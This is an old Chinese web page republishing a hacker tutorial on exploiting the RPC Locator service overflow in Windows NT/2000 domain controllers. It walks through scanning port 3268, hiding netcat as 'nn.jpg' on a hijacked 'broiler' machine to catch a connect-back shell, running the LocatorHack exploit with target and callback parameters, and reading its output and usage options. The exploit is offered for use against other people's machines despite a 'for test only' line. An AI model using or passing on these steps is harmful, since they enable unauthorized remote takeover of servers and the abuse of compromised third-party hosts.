-
您的位置:首页 → 资讯 → 网络应用 → rpc漏洞的利用
rpc漏洞的利用
时间:2004/10/8 16:34:00来源:本站整理作者:蓝点我要评论(0)
-
sunx出的那个程序成功率还不错
没用过的去sunx.org下载吧
简要说一下用法(给没用过的看的)
首先拿superscan去扫3268端口,因为这是域控制器的标志
这个漏洞只对域控制器有效
扫到这样的机器以后,用nc在本地监听一个端口
我是内网,只好在肉鸡上监听了
下面是在肉鸡上~nn.jpg就是我放上去的nc
218.0.0.0代表目标机
123.123.123.123 代表开nc监听的肉鸡
--------------
D:\WINNT\system32>nn.jpg -l -p 1111
nn.jpg -l -p 1111
---------------~~
然后在本地(ip不能说啊)参数大家自己查吧
---------------
C:\>LocatorHack -h 218.0.0.0 -v 2 -l 2 -s 3 -r 123.123.123.123 -p 1111
MsRpcLocator formQueryPacket.wcscpy overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack,
connect socket....
connect smb...
open namedpipe...
bind rpc...
call rpc...
Overflowed, 218.0.0.0:1111 ------???是不是弄错?
good luck
------------------
这时候肉鸡上就出现了对方的system32目录
usage: LocatorHack <-h Host> <-v OSVer> <-l OSLanguage> <-s OSSP> <-r connectback host> <-p connectback port>
OS Version:
winnt: 1
win2k: 2
winxp: 3
OS Language:
english: 1
chinese: 2
japanese: 3
Exp: LocatorHack -h 192.168.0.1 -v 3 -l 1 -s 0 -r 127.0.0.1 -p 99
-h 目标主机
-v OS Version 2000就选2
-l OS Language 按照上面的选择
-s 选择所打的补丁
-r 开nc的主机,可以是你自己也可以放在肉鸡上
-p 用nc开的端口
Locator Service是指向网络特有的名称映射逻辑名称的服务。此次就是在Locator Service中发现安全漏洞的。 Locator Service被捆绑于Window NT 4.0、Windows 2000和Windows XP中。不过,只有被设置成主域控制器的Windows NT 4.0和2000中,在默认条件下Locator Service才是有效的。没有设置成主域控制器的Windows NT/2000及XP则是无效的。 用superscan扫3268吧,很快就能扫到.
相关阅读
Windows错误代码大全 Windows错误代码查询激活windows有什么用Mac QQ和Windows QQ聊天记录怎么合并 Mac QQ和Windows QQ聊天记录Windows 10自动更新怎么关闭 如何关闭Windows 10自动更新windows 10 rs4快速预览版17017下载错误问题Win10秋季创意者更新16291更新了什么 win10 16291更新内容windows10秋季创意者更新时间 windows10秋季创意者更新内容kb3150513补丁更新了什么 Windows 10补丁kb3150513是什么
-
热门文章
360免费wifi电脑版怎么有道云笔记怎么保存网有道云笔记内容丢失怎360免费wifi一直显示正
最新文章
微博热搜宝盒是什么 微最新微信编辑器哪个好
百度网盘安全吗?百度网盘信息泄露怎么回事乐视云盘关闭怎么办 乐视云盘关闭怎么转移文百度云盘下载速度慢解决方法2017 百度云盘下百度网盘怎么用迅雷下载2017 百度网盘怎么用
人气排行
无线网络密码破解WPA/WPA2教程(包教包会)微信编辑器哪个好 3种实用微信编辑器推荐foxmail邮件存储位置在哪 foxmail7.2邮件存p2p种子搜索器用不了解决办法360免费wifi没有无线网卡怎么办百度云网盘中怎么添加好友 百度云网盘添加微信电脑版聊天记录保存在哪 微信电脑版文件360云盘上传速度慢怎么办 360云盘上传速度慢
查看所有0条评论>>